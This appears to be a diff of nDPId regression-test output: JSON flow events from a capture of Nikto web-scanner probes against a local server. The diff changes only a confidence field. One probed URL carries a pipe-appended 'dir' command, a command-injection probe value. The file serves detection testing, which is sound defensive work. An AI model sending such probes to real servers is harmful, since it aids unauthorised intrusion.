-01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276689,"flow_last_seen":1576420276689,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276689,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49586,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.dll","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276689,"flow_last_seen":1576420276689,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276689,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49586,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.dll","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276690,"flow_last_seen":1576420276690,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276690,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49588,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1576420276690,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276690,"pkt":"AAAAAAAAAAAAAAAACABFAADErQxAAEAGjyV\/AAABfwAAAcG0H5DNO5UfftfaRYAYAED+uAAAAQEICp1m+vqdZvr6R0VUIC8waFhDNlpVRS5waHAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276690,"flow_last_seen":1576420276690,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276690,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49588,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276690,"flow_last_seen":1576420276690,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276690,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49588,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276692,"flow_last_seen":1576420276692,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276692,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49590,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1576420276692,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276692,"pkt":"AAAAAAAAAAAAAAAACABFAADEWZ5AAEAG4pN\/AAABfwAAAcG2H5D\/SmGKHR\/Uy4AYAED+uAAAAQEICp1m+vydZvr7R0VUIC8waFhDNlpVRS5hc3AgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276692,"flow_last_seen":1576420276692,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276692,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49590,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276692,"flow_last_seen":1576420276692,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276692,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49590,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276694,"flow_last_seen":1576420276694,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276694,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49592,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1576420276694,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276694,"pkt":"AAAAAAAAAAAAAAAACABFAADIBvJAAEAGNTx\/AAABfwAAAcG4H5DthT7meWwMh4AYAED+vAAAAQEICp1m+v6dZvr9R0VUIC8waFhDNlpVRS5leGV8ZGlyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276694,"flow_last_seen":1576420276694,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276694,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49592,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.exe|dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276694,"flow_last_seen":1576420276694,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276694,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49592,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.exe|dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276695,"flow_last_seen":1576420276695,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276695,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49594,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1576420276695,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276695,"pkt":"AAAAAAAAAAAAAAAACABFAADCG\/NAAEAGIEF\/AAABfwAAAcG6H5DzUiPolNWjYoAYAED+tgAAAQEICp1m+v+dZvr\/R0VUIC9pbmRleC5waHA\/IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQoNCg=="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276695,"flow_last_seen":1576420276695,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276695,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49594,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276695,"flow_last_seen":1576420276695,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276695,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49594,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276697,"flow_last_seen":1576420276697,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276697,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49596,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1576420276697,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276697,"pkt":"AAAAAAAAAAAAAAAACABFAADEgRRAAEAGux1\/AAABfwAAAcG8H5ABRrkFDdcmsoAYAED+uAAAAQEICp1m+wGdZvsBR0VUIC9jZ2kuY2dpLyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276697,"flow_last_seen":1576420276697,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276697,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49596,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi.cgi\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276697,"flow_last_seen":1576420276697,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276697,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49596,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi.cgi\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276699,"flow_last_seen":1576420276699,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276699,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49598,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1576420276699,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276699,"pkt":"AAAAAAAAAAAAAAAACABFAADDtolAAEAGhal\/AAABfwAAAcG+H5DlK46S3uw4X4AYAED+twAAAQEICp1m+wKdZvsCR0VUIC93ZWJjZ2kvIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KDQo="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276699,"flow_last_seen":1576420276699,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276699,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49598,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/webcgi\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276699,"flow_last_seen":1576420276699,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276699,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49598,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/webcgi\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276701,"flow_last_seen":1576420276701,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276701,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49600,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1576420276701,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276701,"pkt":"AAAAAAAAAAAAAAAACABFAADEOWhAAEAGAsp\/AAABfwAAAcHAH5CIUQFyvT1whIAYAED+uAAAAQEICp1m+wWdZvsFR0VUIC9jZ2ktOTE0LyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276701,"flow_last_seen":1576420276701,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276701,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49600,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-914\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276701,"flow_last_seen":1576420276701,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276701,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49600,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-914\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276703,"flow_last_seen":1576420276703,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276703,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49602,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 